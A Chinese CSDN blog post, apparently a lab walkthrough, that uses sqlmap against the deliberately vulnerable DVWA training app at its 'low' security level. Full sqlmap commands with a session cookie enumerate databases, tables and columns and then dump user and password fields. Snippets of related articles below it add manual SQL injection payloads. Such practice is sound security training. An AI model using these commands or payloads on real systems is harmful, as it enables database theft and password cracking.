【DVWA】SQL Injection-low(sqlmap)

最新推荐文章于 2021-09-10 22:43:54 发布
最新推荐文章于 2021-09-10 22:43:54 发布
阅读量168 收藏 1
点赞数
文章标签: mysql 安全 sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44771252/article/details/113404759
版权

SQL 注入(利用sqlmap)——低安全性

【前言】

上次使用的手工注入,有一定的代码审计。那么对于这种存在sql注入漏洞的,哪必定可以使用sqlmap来进行sql注入。


由于我们的DVWA是要登录上去才可以进行里面相应的一些服务。
那么我们就要获取到浏览器中的cookie。

【准备工作】

  • 登录DVWA,选择SQL Injection,按F12进入调试页面中的网络模块。
  • 点击Submit,寻找注入点与所需要的cookie。
    在这里插入图片描述
  • 所需要的信息:
    cookie与注入点 在这里插入图片描述

【使用sqlmap】

【爆破所有数据库】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" --dbs

在这里插入图片描述

【爆破当前(dvwa)数据库中的所有表】
sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa --tables

在这里插入图片描述

【爆破数据表中的所有字段】
 sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users --columns

在这里插入图片描述

【dump出指定字段】

从上一个步骤中我们通过列名就可以很清楚的看出敏感信息——user、password

sqlmap -u "http://192.168.188.201/dvwa/vulnerabilities/sqli/?id=&Submit=Submit" --cookie "low; PHPSESSID=q0u7iggdkgo9lmdso9kslc9a72; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada" -D dvwa -T users -C user,password --dump

在这里插入图片描述

【MD5解密】

可以使用网上工具也可以使用kali自带工具。

liyn10
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
在实际操作中,你可以通过PHPStudy建立环境,然后部署DVWASQL-li-labs,逐一攻破每一个安全挑战,这将有助于提升对Web安全的意识和应对能力。 总结一下,这个压缩包提供了一套完整的Web安全学习和实践环境,包括...
DVWA-SQL Injection 注入&Sqlmap
原味瓜子、的博客
09-22 400
文章目录SQL注入一、Low等级二、Medium等级三、High等级四、Impossible SQL注入 指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 一、Low等级 1、漏洞分析 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT
DVWASQL Injection
baynk的博客
10-29 1683
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ SQL ...
DVWASQL Injection(含SQLMAP使用)
一期一会的博客
03-21 379
DVWASQL Injection 判断是否存在注入的方法:在输入框输入 1’ Select * from xxxx where id =1’ Select * from xxxx where id =’1’’ 无论是整型还是字符型此时都会报错,说明存在注入点 一.等级:LOW (一)分类 1.整型 测试如下: 此时界面结果显示一致,说明并非整型 select * from xxx where id=1 and 1=2 若为整型,说明sql语句不成立,会报错 2.字符型 在输入框输入“1’ an
dvwa php sql,DVWA SQL Injection之sqlmap使用
weixin_30313365的博客
03-18 169
使用神器sqlmap进行DVWASQL Injection需要注意的点:dvwa需要登录才能访问漏洞测试页面,所以使用sqlmap时需要提交登录后的cookie,cookie中有关于dvwa的security level设置属性,确保属性值是low(1)检测是否存在sql注入漏洞Sqlmap -u “http://127.0.0.1/DVWA-1.0.8/vulnerabilities/sqli...
DVWA SQL Injection 利用SQLMap注入
Senimo
03-18 732
DVWA SQL Injection 利用SQLMap注入LowMediumHigh Low 输入1,提交后得到回显: 发现是GET传参: http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# 直接携带Cookie后使用SQLMap注入即可: sqlmap -u "http://xxx/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low
DVWA靶场环境---新手入坑
10-28
DVWA靶场环境---新手学习web安全的必备靶场之一,DVWA (Dam Vulnerable Web Application)是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
最新发布
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
1、渗透之利用sqlmapdvwa进行sql注入
tzyyy1的博客
02-28 7156
测试环境:dvwa+Kail 1、寻找注入点:http://192.168.43.75/dvwa/vulnerabilities/sqli/ 1.2、注入点初步测试: 1' union select user, password from users# 1.3、继续测试:1'or'1'='1 2、使用Kail工具测试: sqlmap -u http://192.168.43....
sqlmap dvwa SQL Injection使用小记
无心插柳
10-29 9531
sqlmap初步使用,测试环境为dvwa
dvwasql injection之sqlmap工具注入(low版)
crowsec
04-27 1832
可能要用到的参数:-u             指定URL--cookie     带cookie注入爆库:--dbs     发现所有数据库 (参数前有空格)列出数据库:--tables     列出数据库表  (参数前有空格)-D            选择数据库首先一定先把难度调为low当写1-5的时候,都会有值出来直接上工具如下:Sqlmap -u "http://127.0.0.1/dv...
使用SQLMAP学习DVWA-SQL Injection(SQL注入)
weixin_43838889的博客
04-28 554
SQLMAP 是知名的自动化SQL注入和数据库工具,需要Python环境运行。 本文参考SQLMAP详解 向博主致谢 浏览器F12进入开发者调试界面,将Request Headers部分全部复制保存成dvwa_sqli_low.txt文件。 ##Low 执行sqlmap.py -r dvwa_sqli_low.txt, -r REQUESTFILE Load HTTP request from a file 从文件加载HTTP请求 D:
DVWA实战篇-sql injection(手工篇)
weixin_58660073的博客
05-26 201
DVWA实战篇-sql injection(手工篇) SQL Injection(SQL注入) 一.漏洞描述 当应用程序使用输入内容来构造动态SQL语句以访问数据库时,如果对输入的参数没有进行严格的过滤或者过滤不完整将会导致SQL注入攻击的产生。恶意用户通过构造特殊的SQL查询语句把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。从而可以获取到数据库的相关信息,包括数据库账号密码信息,甚至可上传木马,从而控制服务器。 二.漏洞验证 Low
DVWA SQL Injection Sqlmap
SELF_REDEEM的博客
09-10 241
记录使用Sqlmap完成自动化sql注入的实验过程,供自己参考 访问SQL注入页面,输入id,查看访问的URL为 http://192.168.9.128/dvwa-master/vulnerabilities/sqli/?id=1&Submit=Submit# 使用Sqlmap进行注入测试,但是该URL必须登陆后才能访问,因此我们需要先拿到可以登录的凭证,有的站点认证信息在headers中携带,sqlmap支持加上--headers=HEADERS参数指定headers。假设我们现在拿到了网
使用SQLmapdvwa进行SQL注入测试
yusakul的博客
11-19 3238
SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动。 windows上需要搭建Python环境,下载sqlmap包并解压。。 设置dvwa级别为low(medium,high都可以,不要设成impossible就行) 打开dvwaSQL Injection,打开浏览器调试,输入user id并submit...
【渗透测试】【SqlmapDVWA-SQL Injection(low)
preserphy的博客
07-05 354
①进入sqlmap目录,使用-u命令访问地址:python sqlmap.py -u "http://192.168.133.128/dvwa/vulnerabilities/sqli/?id=1&amp;Submit=Submit#"发现跳转到302了,被重定向了,所以这样不行…又回到浏览器页面看了一下请求,发现里面有cookie,所以我们要把相应的cookie加上。②使用--cookie命令加...
DVWA之LOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7835
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMapdvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
dvwa sql injection
03-16
DVWA (Damn Vulnerable Web Application) 是一个用于演示 web 应用程序漏洞的模拟环境。其中之一的漏洞是 SQL 注入攻击。它允许攻击者在 web 应用程序的数据库后面执行非法的 SQL 命令,从而访问敏感信息或控制系统...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值